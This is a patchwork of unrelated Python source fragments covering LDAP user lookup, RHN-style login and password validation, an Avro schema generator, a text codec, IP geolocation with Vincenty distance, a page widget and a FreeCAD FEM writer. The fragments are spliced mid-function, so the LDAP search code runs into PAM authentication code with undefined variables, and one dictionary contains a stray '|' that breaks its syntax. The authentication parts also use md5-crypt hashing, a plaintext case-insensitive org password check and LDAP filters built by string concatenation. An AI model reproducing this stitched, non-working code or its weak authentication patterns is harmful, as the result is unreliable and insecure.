if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get():
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name_attr=None, user_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method finding users. This supports searching for users
by distinguished name, or the configured username attribute.
:param username_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``username_pattern``. Defaults to LDAP -> USERS -> USER_NAME_ATTR config value.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
if not search_attr:
search_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
if not user_name_attr:
user_name_attr = search_attr
if not user_filter:
user_filter = self.ldap_config.USERS.USER_FILTER.get()
# Note that if the user is only reserved we don't do PAM authentication
if data.get('use_pam_authentication') == 'Y' and CFG.pam_auth_service:
# Check the password with PAM
import rhnAuthPAM
if rhnAuthPAM.check_password(username, password, CFG.pam_auth_service) <= 0:
# Bad password
raise rhnFault(2)
# We don't care about the password anymore, replace it with something
import time
password = 'pam:%.8f' % time.time()
else:
# Regular authentication
if check_password(password, data["password"], data["old_password"]) == 0:
# Bad password
raise rhnFault(2)
# From this point on, the password may be encrypted
if encrypted_password:
password = encrypt_password(password)
is_real = 0
# the password matches, do we need to create a new entry?
if not data.has_key("id"):
user = User(username, password)
else: # we have to reload this entry into a User structure
user = User(username, password)
if not user.reload(data["id"]) == 0:
# something horked during reloading entry from database
# we can not really say that the entry does not exist...
raise rhnFault(10)
is_real = 1
# now we have user reloaded, check for updated email
if email:
# don't update the user's email address in the satellite context...
# we *must* in the live context, but user creation through up2date --register
# is disallowed in the satellite context anyway...
if not pre_existing_user:
user.set_info("email", email)
# XXX This should go away eventually
if org_id and org_password: # check out this org
h = rhnSQL.prepare("""
select id, password from web_customer
where id = :org_id
""")
h.execute(org_id=str(org_id))
data = h.fetchone_dict()
if not data: # wrong organization
raise rhnFault(2, _("Invalid Organization Credentials"))
# The org password is not encrypted, easy comparison
if string.lower(org_password) != string.lower(data["password"]):
# Invalid org password
raise rhnFault(2, _("Invalid Organization Credentials"))
if is_real: # this is a real entry, don't clobber the org_id
old_org_id = user.contact["org_id"]
new_org_id = data["id"]
if old_org_id != new_org_id:
raise rhnFault(42,
_("User `%s' not a member of organization %s") %
(username, org_id))
else: # new user, set its org
user.set_org_id(data["id"])
# force the save if this is a new entry
ret = user.save()
if not ret == 0:
raise rhnFault(5)
# check if we need to remove the reservation
if not data.has_key("id"):
# remove reservation
h = rhnSQL.prepare("""
delete from rhnUserReserved where login_uc = upper(:username)
""")
h.execute(username=username)
return 0
# Do some minimal checks on the data thrown our way
def check_user_password(username, password):
# username is required
if not username:
raise rhnFault(11)
# password is required
if not password:
raise rhnFault(12)
if len(username) < CFG.MIN_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters")
% CFG.MIN_USER_LEN)
if len(username) > CFG.MAX_USER_LEN:
raise rhnFault(700, _("username should be less than %d characters")
% CFG.MAX_USER_LEN)
username = username[:CFG.MAX_USER_LEN]
# Invalid characters
# ***NOTE*** Must coordinate with web and installer folks about any
# changes to this set of characters!!!!
invalid_re = re.compile(".*[\s&+%'`\"=#]", re.I)
tmp = invalid_re.match(username)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15, _("username = `%s', invalid character `%s'") % (
username, username[pos[1]-1]))
# use new password validation method
validate_new_password(password)
return username, password
# Do some minimal checks on the e-mail address
def check_email(email):
if email is not None:
email = string.strip(email)
if not email:
# Still supported
return None
if len(email) > CFG.MAX_EMAIL_LEN:
raise rhnFault(100, _("Please limit your e-mail address to %s chars") %
CFG.MAX_EMAIL_LEN)
# XXX More to come (check the format is indeed foo@bar.baz)
return email
# Validates the given key against the current or old password
# If encrypted_password is false, it compares key with pwd1 and pwd2
# If encrypted_password is true, it compares the encrypted key
# with pwd1 and pwd2
#
# Historical note: we used to compare the passwords case-insensitive, and that
# was working fine until we started to encrypt passwords. -- misa 20030530
#
# Old password is no longer granting access -- misa 20040205
def check_password(key, pwd1, pwd2=None):
encrypted_password = CFG.encrypted_passwords
log_debug(4, "Encrypted password:", encrypted_password)
# We don't trust the origin for key, so stringify it
key = str(key)
if len(key) == 0:
# No zero-length passwords accepted
return 0
if not encrypted_password:
# Unencrypted passwords
if key == pwd1: # good password
return 1
log_debug(4, "Unencrypted password doesn't match")
return 0 # Invalid
# Crypted passwords in the database
if pwd1 == encrypt_password(key, pwd1):
# Good password
return 1
log_debug(4, "Encrypted password doesn't match")
return 0 # invalid
# Encrypt the key
# If no salt is supplied, generates one (md5-crypt salt)
def encrypt_password(key, salt=None):
# Case insensitive key
if not salt:
# No salt supplied, generate it ourselves
import base64
import time
import os
# Get the first 7 digits after the decimal point from time.time(), and
# add the pid too
salt = (time.time() % 1) * 1e7 + os.getpid()
# base64 it and keep only the first 8 chars
salt = base64.encodestring(str(salt))[:8]
# slap the magic in front of the salt
salt = "$1$%s$" % salt
salt = str(salt)
return crypt.crypt(key, salt)
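# Quick illustration (assumes a crypt(3) that understands the "$1$" md5-crypt
# magic, as glibc does): verifying a password is just re-encrypting it with
# the stored hash as the salt, which is the pwd1 == encrypt_password(key, pwd1)
# comparison done in check_password() above.
#
#   hashed = encrypt_password('secret')            # e.g. '$1$MDg3NDY1$...'
#   assert encrypt_password('secret', hashed) == hashed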
# Perform all the checks required for new passwords
def validate_new_password(password):
log_debug(3, "Entered validate_new_password")
#
# We're copying the code because we don't want to
# invalidate any of the existing passwords.
#
# Validate password based on configurable length
# regular expression
if not password:
raise rhnFault(12)
if len(password) < CFG.MIN_PASSWD_LEN:
raise rhnFault(14, _("password must be at least %d characters")
% CFG.MIN_PASSWD_LEN)
if len(password) > CFG.MAX_PASSWD_LEN:
raise rhnFault(701, _("Password must be shorter than %d characters")
% CFG.MAX_PASSWD_LEN)
password = password[:CFG.MAX_PASSWD_LEN]
invalid_re = re.compile(
r"[^ A-Za-z0-9`!@#$%^&*()-_=+[{\]}\\|;:'\",<.>/?~]")
asterisks_re = re.compile(r"^\**$")
# make sure the password isn't all *'s
tmp = asterisks_re.match(password)
if tmp is not None:
raise rhnFault(15, "password cannot be all asterisks '*'")
# make sure we have only printable characters
tmp = invalid_re.search(password)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15,
_("password contains character `%s'") % password[pos[1]-1])
# Perform all the checks required for new usernames
def validate_new_username(username):
log_debug(3)
if len(username) < CFG.MIN_NEW_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters long")
% CFG.MIN_NEW_USER_LEN)
disallowed_suffixes = CFG.DISALLOWED_SUFFIXES or []
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return result_node
def _get_random_existing_node(self):
nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
assert False, 'Unknown type: ' + node.node_type
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
parser.add_option('--num_scalars', default='10', type='int',
help='Target number of scalar fields per schema.')
parser.add_option('--nesting_depth', default='3', type='int',
help='Target nesting depth of each schema.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
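# For reference (illustration only; names and types vary with the random
# seed), a generated .avsc for --num_scalars=1 comes out roughly like:
#
#   {
#     "fields": [
#       {"name": "field_1", "type": {"items": "int", "type": "array"}}
#     ],
#     "name": "table_0",
#     "namespace": "org.apache.impala",
#     "type": "record"
#   }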
def standard_text_from_block(block, offset, max_length):
text = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return text
else:
text += chr(c - 0x30)
return text
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
text_pos = end_bracket_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
raise ValueError("String cannot be written in {} bytes or less: {}".format(
max_length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list
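# Round-trip sketch of the codec above: characters are stored with a +0x30
# offset and, when shorter than max_length, terminated by a 0 byte.
def _codec_roundtrip_demo():
    block = bytearray(16)
    standard_text_to_block(block, 0, 'HI', 16)
    assert list(block[:3]) == [ord('H') + 0x30, ord('I') + 0x30, 0]
    assert standard_text_from_block(block, 0, 16) == 'HI'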
INSTALL_PATH = '/home/fred/workspace/grafeo/'
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
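# Example (figures from the upstream maurycyp/vincenty README): Boston to
# New York along the WGS 84 ellipsoid.
#
#   boston = (42.3541165, -71.0693514)
#   newyork = (40.7791472, -73.9680804)
#   vincenty(boston, newyork)              # -> 298.396057 (kilometers)
#   vincenty(boston, newyork, miles=True)  # -> 185.414657 (miles)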
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": | raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
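# Usage sketch (hypothetical entry point, not part of this module): run the
# detection with a throwaway session; ipapi.co is queried first and
# ip-api.com is the fallback.
#
#   async def _demo():
#       async with aiohttp.ClientSession() as session:
#           info = await async_detect_location_info(session)
#           if info is not None:
#               print(info.city, info.country_code, info.use_metric)
#
#   asyncio.run(_demo())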
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.constants import url
from lib.page.widget.base import Widget
class AdminPeople(Widget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
+ url.Widget.PEOPLE
# * under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- next step would be to save the constraint node and element data in the FreeCAD FEM Mesh Object
and link them to the appropriate constraint object
- if this information is used by the FEM Mesh file exporter, FreeCAD would support writing FEM Mesh Groups,
which is a much needed feature of the FEM module
- smesh supports mesh groups; how about the Python binding in FreeCAD? Is there something implemented already?
'''
__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatflux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = analysis_type
self.dir_name = dir_name
if not dir_name:
print('Error: FemInputWriter has no working_dir --> we are going to make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_planerotation_nodes(self):
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
for femobj in self.transform_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
# TODO in FemTools: check if all RefShapes really have the same type and write the type to the dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
if femobj['RefShapeType'] == 'Vertex': # point load on vertices
